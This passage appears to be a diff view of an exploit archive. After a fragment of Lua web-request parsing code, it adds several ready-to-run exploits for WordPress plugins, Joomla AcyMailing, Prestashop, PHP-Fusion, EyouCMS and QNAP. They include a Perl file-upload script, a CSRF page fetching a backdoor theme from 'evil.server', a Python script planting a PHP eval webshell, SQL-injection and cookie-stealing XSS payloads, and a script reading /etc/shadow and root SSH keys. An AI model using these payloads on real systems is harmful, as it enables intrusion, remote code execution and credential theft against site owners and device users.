print("nil")
elseif type(var) == "table" then
for k,v in pairs(var) do
if type(k) == "string" then k="'"..k.."'" end
if(type(v) == "string") then
print(k.."=>'"..v.."',")
elseif(type(v) == "number" or type(v) == "boolean") then
print(k.."=>"..tostring(v)..",")
elseif(type(v) == "function") then
print(k.."=>function,")
elseif(type(v) == "thread") then
print(k.."=>thread,")
elseif(type(v) == "userdata") then
print(k.."=>userdata,")
elseif(type(v) == "nil") then
print(k.."=>nil,")
elseif(type(v) == "table") then
print(k.."=>table,")
else
print(k.."=>object,")
end
end
else
print("object")
end
print("}")
end
function init_get()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
string.gsub (urlparam, "([^&=]+)=([^&=]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_GET,key,val)
else
rawset(_GET,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_GET,unescape(key),unescape(val))
else
--rawset(_GET,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
function init_post()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
if
string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=")
then
string.gsub (strContent,
"[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
else
string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
end
function init_session()
if _COOKIE["UIDADMIN"] ~= nil then
_SESSION_ID = _COOKIE["UIDADMIN"]
SessionModule.load(_SESSION_ID)
end
end
function init_cookie()
local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)")
if cookiestr == nil or cookiestr == "" then return end
string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?",
function (key, val)
rawset(_COOKIE,unescape(key),unescape(val))
end
)
end
function setcookie(name,value,expire_secs)
if name == "UIDADMIN" then return end
local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT",
os.time()+3600*24*365)
_SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value..";
expires="..expiretime.."\r\n"
rawset(_COOKIE,name,value)
end
function getcookie(name)
if name == "UIDADMIN" then return end
return _COOKIE[name]
end
function deletecookie(name)
setcookie(name,"",-10000000)
end
function deleteallcookies()
for name,_ in pairs(_COOKIE) do
deletecookie(name)
end
end
local cookie_metatable =
{
__newindex = function(t,k,v)
setcookie(k,v,360000)
end
}
setmetatable(_COOKIE,cookie_metatable)
session_metatable =
{
__newindex = function(t,k,v)
if type(v) ~= "table" then
if k ~= nil then
k = string.gsub(k,"'","")
k = string.gsub(k,"\"","")
end
if v ~= nil then
--v = string.gsub(v,"%[","")
--v = string.gsub(v,"%]","")
end
rawset(_SESSION,k,v)
SessionModule.save(_SESSION_ID)
end
end
}
--setmetatable(_SESSION,session_metatable)
function init_all()
init_cookie()
init_session()
init_get()
init_post()
end
function setContentType(typestr)
_CONTENTTYPE = typestr
end
function exit()
error("exit function!")
end

23
exploits/php/webapps/48213.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Wordpress Plugin Custom Searchable Data System -
Unauthenticated Data modification
# Date: 13 March 2020
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Software Link:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Version: 1.7.1
Plugin fails to perform authorization check to delete/add/edit data entries.
PoC (delete entry):
GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY
ID1]&sds-del-entry-last-entry-id=[ENTRY
ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs
Note: plugin is not maintained now, either remove it, or apply the
authorization check to all actions.
Special thanks to *Wordfence and Sean Murphy!
(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/
<https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/>)*

32
exploits/php/webapps/48222.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection
# Google Dork: n/a
# Date: 2020-03-16
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: unkn0wn
# Tested on: Windows 10, Kali
# CVE : n/a
################################
# Vuln-Code: download.php
$link=$_GET['link'];
$agent=esc__($_SERVER['HTTP_USER_AGENT']);
if(isset($_GET['botid'])){
$botid=esc__($_GET['botid']);
}else{
$botid='unknown';
};
################################
Attack Response & PoC:
---
Parameter: link (GET)
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY
---
http://127.0.0.1/ush/gates/token.php?link=1

191
exploits/php/webapps/48230.txt Normal file
View file

@ -0,0 +1,191 @@
# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload
# Google Dork: inurl:"index.php?option=com_acym"
# Date: 2020-03-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.acyba.com/
# Software Link: https://www.acyba.com/acymailing/download.html
# Version: v6.9.1 Starter
# Tested on: Joomla! v3.9.0
# CVE: N/A
########################################################################################
#Analysis of vulnerability
########################################################################################
Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php".
[BEGIN_CODE]
600 public function setNewIconShare()
601 {
602 $socialName = acym_getVar('string', 'social', '');
603 $extension = pathinfo($_FILES['file']['name']);
604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName;
605 $newPathComplete = $newPath.'.'.$extension['extension'];
606 //There code is no checking CSRF token, no sanitizing, and authentication.
607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!!
608 echo 'error';
609 exit;
610 }
611
612 $newConfig = new stdClass();
613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true);
614
615 $newImg = acym_rootURI().$newPathComplete;
616 $newImgWithoutExtension = acym_rootURI().$newPath;
617
618 $newConfig->social_icons[$socialName] = $newImg;
619 $newConfig->social_icons = json_encode($newConfig->social_icons);
620 $this->config->save($newConfig);
621
622 echo json_encode(
623 [
624 'url' => $newImgWithoutExtension,
625 'extension' => $extension['extension'],
626 ]
627 );
628 exit;
629 }
function acym_uploadFile($src, $dest)
{
$dest = acym_cleanPath($dest);
$baseDir = dirname($dest);
if (!file_exists($baseDir)) {
acym_createFolder($baseDir);
}
if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!!
if (@chmod($dest, octdec('0644'))) {
return true;
} else {
acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error');
}
} else {
acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error');
}
return false;
}
[END_CODE]
########################################################################################
#Exploit
########################################################################################
#!/usr/bin/perl
#
#$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php
use strict;
use warnings;
use LWP::UserAgent;
use JSON(qw/decode_json/);
########################################################################################
sub print_usage_and_exit
{
print("*** com_acym Arbitrary File Upload exploit\n");
print("Usage: $0 <URL> <path_to_upload> <file_to_upload>\n");
print("\n");
exit();
}
sub fetch_useragent
{
my @available_useragents = (
"gertrud barkhorn",
"erica hartmann",
"eila ilmatar juutilainen",
);
return($available_useragents[(rand(scalar(@available_useragents)))]);
}
sub is_valid_url
{
my $given_url = shift(@_);
return 1 if ( $given_url =~ /^http(s)?:\/\// );
return 0;
}
sub do_die
{
my $errmsg = shift(@_);
printf("[!] %s\n", $errmsg);
exit();
}
sub get_base_path
{
return(sprintf("%s/index.php", $_[0]));
}
sub do_exploit
{
my %params = %{ shift(@_); };
my $ua = LWP::UserAgent->new(
"agent" => $params{"useragent"},
"timeout" => 360
);
print("[+] Trying to exploit ...\n");
print("[*] Sending POST request ...\n");
my $response = $ua->post(
get_base_path($params{"url"}),
"Content-Type" => "form-data",
"Accept-Language" => "zh-cn",
"Content" => {
"option" => "com_acym",
"ctrl" => "frontmails",
"task" => "setNewIconShare",
"social" => $params{"path"},
"file" => [ $params{"file"} ],
},
);
if ( $response->code == 200 )
{
my $j = decode_json($response->decoded_content);
my $f = sprintf("%s.%s",
$j->{"url"}, $j->{"extension"});
my $response = $ua->head($f);
printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 );
}
}
sub main
{
print_usage_and_exit() if ( scalar(@ARGV) < 2 );
my %params = (
"url" => $ARGV[0],
"path" => $ARGV[1],
"file" => $ARGV[2],
"useragent" => fetch_useragent());
do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) );
do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0);
printf("[*] Parameters:\n");
while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); }
printf("*" x50 . "\n");
while ( 1 )
{
printf("[?] Proceed(y/n)> ");
my $c = <STDIN>;
chomp($c);
if ( (length($c) == 1) and lc($c) eq "y" )
{
do_exploit(\%params);
last;
}
}
}
main();
########################################################################################

39
exploits/php/webapps/48238.txt Normal file
View file

@ -0,0 +1,39 @@
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source:
    88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
    86: foreach($files['tmp_name'] as $key=>$tmp_name)
    80: $files = $_FILES['file']){
    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)),
    87: $dest = $tmpDir . '/' . $files['name'][$key];
    81: $tmpDir = APP_PATH . '/.tmp';
    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define()
    80: $files = $_FILES['file']){
    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)),
    80: if(isset($_FILES['file']) && $files = $_FILES['file'])
    84: if(is_array($files['tmp_name']))
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg

60
exploits/php/webapps/48278.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability
# Google Dork: N/A=20
# Date: 2020-04-01
# Exploit Author: Unkn0wn
# Vendor Homepage: https://www.php-fusion.co.uk
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: 9.03.50
# Tested on: Ubuntu
# CVE : N/A
---------------------------------------------------------
Code Execution:
This vulnerabilty in "add_panel_form()" function.
in line 527 we can see "eval" tag:
*
eval("?>".stripslashes($_POST['panel_content'])."<?php ");
*
and to this funcation in line 528 - 530 return us payload:
*
$eval =3D ob_get_contents();
ob_end_clean();
echo $eval;
=09=09=09=09=09
*
Demo:
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4
POST DATA:
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
el_content=3D;"Code Execution Payload"&panel_access=3D0&panel_languages[]=
=3DEnglish&panel_save=3DPreview Panel
----------------------------
Cross site-scripting:
In line 532 with POST DATA prin"t panel_content:
"
echo "<p>".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."</=
p>\n";
"
Demo:
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4
POST DATA:
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
el_content=3D;"<script>alert('Unkn0wn')</script>"&panel_access=3D0&panel_la=
nguages[]=3DEnglish&panel_save=3DPreview Panel
----------------------------------------------------------
# Contact : 0x9a@tuta.io
# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher

30
exploits/php/webapps/48307.txt Normal file
View file

@ -0,0 +1,30 @@
Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle
core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );
// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );
@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->
if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");
Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1

121
exploits/php/webapps/48347.txt Normal file
View file

@ -0,0 +1,121 @@
<html>
<!--
# Exploit Title: Prestashop <= 1.7.6.4 single-click RCE exploit
# Date: 2020-04-11
# Exploit Author: Sivanesh Ashok | @sivaneshashok | stazot.com
# Vendor Homepage: https://www.prestashop.com/
# Version: 1.7.6.4 and below
# Tested on: Windows 10 / XAMPP / Prestashop v1.7.6.4
Prestashop <= 1.7.6.4 single-click RCE exploit
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com/prestashop-csrf-to-rce-article
Change the values of the 3 variables marked as "change this"
-->
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
<script>history.pushState('', '', '/')</script>
<script>
var target = "http://localhost"; //change this
var admin_url = "/admin123ab45cd"; //change this
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
var xhr0 = new XMLHttpRequest();
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
xhr0.withCredentials = true;
xhr0.send();
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body = "-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
"\r\n" +
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
"\t\r\n" +
"\t\x3cscript\x3e\r\n" +
"\t\r\n" +
"\t$.ajaxSetup({async: false});\r\n" +
"\r\n" +
"\tvar target = \'" + target + "\';\r\n" +
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
"\tvar import_url = \'\';\r\n" +
"\tvar import_token = \'\';\r\n" +
"\t\r\n" +
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
"\t\r\n" +
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
"\t\ttmp = tmp[1];\r\n" +
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\t$.get(import_url, function( my_var1 ) {\r\n" +
"\r\n" +
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
"\t\timport_token = tmp[1];\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\tvar themeUploadData = new FormData();\r\n" +
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
"\r\n" +
"\t$.ajax({\r\n" +
"\t\turl: import_url,\r\n" +
"\t\tdata: themeUploadData,\r\n" +
"\t\tcache: false,\r\n" +
"\t\tcontentType: false,\r\n" +
"\t\tprocessData: false,\r\n" +
"\t\tmethod: \'POST\'\r\n" +
"\t});\r\n" +
"\r\n" +
"\t\x3c/script\x3e\r\n" +
"\r\n" +
"\x3c/svg\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.setTimeout(function(){
submitRequest();
}, 1500);
window.setTimeout(function(){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = target+"/img/cms/exploit.svg";
document.body.appendChild(iframe);
}, 4000);
</script>
</body>
</html>

95
exploits/php/webapps/48349.py Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution
# Date: 2020-04-2019
# Exploit Author: coiffeur
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress v5.4 Simple File List v4.2.2
import requests
import random
import hashlib
import sys
import os
import urllib3
urllib3.disable_warnings()
dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
def usage():
banner = """
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
AUTHOR: coiffeur
"""
print(banner)
def generate():
filename = f'{random.randint(0, 10000)}.png'
password = hashlib.md5(bytearray(random.getrandbits(8)
for _ in range(20))).hexdigest()
with open(f'{filename}', 'wb') as f:
payload = '<?php if($_POST["password"]=="' + password + \
'"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>'
f.write(payload.encode())
print(f'[ ] File {filename} generated with password: {password}')
return filename, password
def upload(url, filename):
files = {'file': (filename, open(filename, 'rb'), 'image/png')}
datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
r = requests.post(url=f'{url}{upload_path}',
data=datas, files=files, verify=False)
r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
if r.status_code == 200:
print(f'[ ] File uploaded at {url}{dir_path}{filename}')
os.remove(filename)
else:
print(f'[*] Failed to upload {filename}')
exit(-1)
return filename
def move(url, filename):
new_filename = f'{filename.split(".")[0]}.php'
headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
'X-Requested-With': 'XMLHttpRequest'}
datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
r = requests.post(url=f'{url}{move_path}',
data=datas, headers=headers, verify=False)
if r.status_code == 200:
print(f'[ ] File moved to {url}{dir_path}{new_filename}')
else:
print(f'[*] Failed to move {filename}')
exit(-1)
return new_filename
def main(url):
file_to_upload, password = generate()
uploaded_file = upload(url, file_to_upload)
moved_file = move(url, uploaded_file)
if moved_file:
print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
datas = {'password': password, 'cmd': 'phpinfo();'}
r = requests.post(url=f'{url}{dir_path}{moved_file}',
data=datas, verify=False)
if r.status_code == 200 and r.text.find('php') != -1:
print('[+] Exploit work !')
print(f'\tURL: {url}{dir_path}{moved_file}')
print(f'\tPassword: {password}')
if __name__ == "__main__":
if (len(sys.argv) < 2):
usage()
exit(-1)
main(sys.argv[1])

49
exploits/php/webapps/48374.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Date: 2020-04-22
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://kaasoft.pro/
# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281
# Product Version: v2.2.0
# Product : Library CMS
# Vulernability Type : Broken Authentication
# Vulenrability : Session Fixation
# CVE : N/A
# Description :
Session Fixation vulnerability has been discovered in v2.2.0
version of Library CMS Powerful Book Management System.
Admin HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD
Member HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD

22
exploits/php/webapps/48529.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2020-05-28
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: MacosX
# CVE : N/A
# PoC
Affected code
<?php if(@$_GET['fid']) {
echo '<br />';
$id=@$_GET['fid'];
$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or
die('Error');
http://berklocal/dash.php?fid=SQL-INJECTION

30
exploits/php/webapps/48530.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting
# Date: 2020-05-28
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: https://eyoucms.com
# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip
# Version: EyouCMS V1.4.6
# Tested on: Windows
# CVE : N/A
Vulnerable Request:
POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1
Host: 192.168.31.244
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.244
Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php
Connection: close
title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111<img src=1 onerror=alert(document.cookie)>&__token__=b90d4bf2356b81f65284238857b91ada
王新峰 技术管理部
中国银行保险信息技术管理有限公司

103
exploits/php/webapps/48531.py Executable file
View file

@ -0,0 +1,103 @@
# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
# Exploit Author: Yunus YILDIRIM (Th3Gundy)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Date: 2020-05-28
# Vendor Homepage: https://www.qnap.com
# Version: QTS < 4.4.1 | Photo Station < 6.0.3
# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195
# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
######################################################################
######################################################################
#!/usr/bin/python3
__author__ = "Yunus YILDIRIM (@Th3Gundy)"
__version__ = "0.1"
import requests
import re, sys
# hide ssl error
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def get_banner():
print("""\033[91m
\033[0m \033[94m {0} \033[0m
""".format(__author__))
def get_file_content(file):
post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10)
print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text))
# print banner
get_banner()
if len(sys.argv) != 2:
print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m")
sys.exit(-1)
url = sys.argv[1].rstrip('/')
headers = {"User-Agent": "Gundy - QNAP RCE"}
# for session cookie
req = requests.Session()
#######################################################################
# search album_id
print("="*65)
post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'}
album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10)
if album_id_response.status_code != 200:
print("album id not found \n\033[91mnot vulnerable\033[0m")
sys.exit(0)
album_id = re.search('(?<=<output>).*?(?=</output>)', album_id_response.text).group()
print("album_id ==> " + album_id)
#######################################################################
# search $_SESSION['access_code']
access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10)
if access_code_response.status_code != 200:
print("slideshow not found \n\033[91mnot vulnerable\033[0m")
sys.exit(0)
access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group()
print("access_code ==> " + access_code)
#######################################################################
# /etc/passwd file read
get_file_content('./../../../../../etc/passwd')
# /etc/shadow read
get_file_content('./../../../../../etc/shadow')
# /etc/hostname read
get_file_content('./../../../../../etc/hostname')
# /root/.ssh/id_rsa read
get_file_content('./../../../../../root/.ssh/id_rsa')
#######################################################################

23
exploits/php/webapps/48532.txt Normal file
View file

@ -0,0 +1,23 @@
